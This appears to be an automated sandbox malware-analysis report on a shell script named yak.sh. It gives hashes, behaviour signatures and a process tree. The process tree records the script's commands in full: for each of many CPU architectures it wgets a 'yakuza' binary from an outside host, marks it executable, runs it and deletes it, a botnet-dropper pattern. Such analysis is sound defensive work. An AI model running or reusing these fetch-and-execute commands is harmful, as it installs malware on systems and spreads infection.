Analysis
-
max time kernel
8s -
max time network
10s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
19-10-2024 11:40
General
-
Target
yak.sh
-
Size
1KB
-
MD5
d38e8407bbc72cbd2057efdd3d8b7a05
-
SHA1
89e1ebb28cea58b8f9eb728383f8cb565d58518e
-
SHA256
ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1
-
SHA512
c0a0450a308555a0c3ff52d7d8fc0ce8ff55b9bca8b700cdf87b222b2bfe2ea112de21aa59a8535020b7d4636f64334606494da99e007caecb09ff3ae69589c9
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.sh2⤵
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sh./yakuza.sh2⤵
-
-
/bin/rmrm -rf yakuza.sh2⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.x862⤵
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.x86./yakuza.x862⤵
-
-
/bin/rmrm -rf yakuza.x862⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm62⤵
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵
-
-
/bin/rmrm -rf yakuza.arm62⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.i6862⤵
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i686./yakuza.i6862⤵
-
-
/bin/rmrm -rf yakuza.i6862⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵
-
-
/bin/rmrm -rf yakuza.ppc2⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.i5862⤵
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i586./yakuza.i5862⤵
-
-
/bin/rmrm -rf yakuza.i5862⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.m68k2⤵
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵
-
-
/bin/rmrm -rf yakuza.m68k2⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm42⤵
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵
-
-
/bin/rmrm -rf yakuza.arm42⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm52⤵
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵
-
-
/bin/rmrm -rf yakuza.arm52⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.arm72⤵
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵
-
-
/bin/rmrm -rf yakuza.arm72⤵
-
-
/usr/bin/wgetwget http://pirati.abuser.eu/yakuza.sparc2⤵
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵
-
-
/bin/rmrm -rf yakuza.sparc2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
183KB
MD5983c5d72544a32a574f5e914253a618b
SHA176cd31603cb4e7fa0c78e37c62b5857098f78442
SHA256fc4a02d90a8b9efeb4dfba835d514b728399bc8424253341a30e13b40cb15373
SHA5127a667b29715b153c58abe022d862f0fcc789b24f5f7cd8fb94c5079d0c513d54ba37b061979993c6a3a1ebe1046ceeb03581119b542bef7b1abe8dc6b300c9bf